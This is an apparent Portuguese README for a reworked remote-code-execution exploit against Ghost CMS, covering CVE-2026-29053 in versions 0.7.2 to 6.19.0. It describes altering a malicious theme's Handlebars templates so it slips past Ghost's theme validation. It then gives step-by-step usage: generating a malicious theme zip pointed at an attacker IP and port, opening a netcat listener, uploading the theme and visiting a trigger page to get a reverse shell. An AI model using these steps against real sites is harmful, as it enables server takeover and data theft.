
Vulnerabilidade (RCE) descoberta no Ghost CMS (afetando especificamente as versões 0.7.2 a 6.19.0)
Este é um retrabalho do Repo de rootxran para esta mesma CVE - https://github.com/rootxran/CVE-2026-29053
Durante testes contra ambientes específicos do Ghost CMS, o payload do tema original acionou um Erro Fatal do Handlebars. O CMS falhou ao ativar o tema malicioso porque ele referenciava um helper obsoleto ou ausente (social_url) dentro do arquivo author.hbs.
Atualizei os templates Handlebars para usar helpers nativos e compatíveis. Isso garante que o tema passe nas verificações internas de validação do Ghost, permitindo que o exploit seja ativado com sucesso sem ser bloqueado pelo parser de segurança do mecanismo de temas.
Uso: (consulte o exploit original para a orientação em vídeo).
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip
1. nc -lvnp 4444
2. Upload theme, create page with slug 'rce'
3. Visit /rce/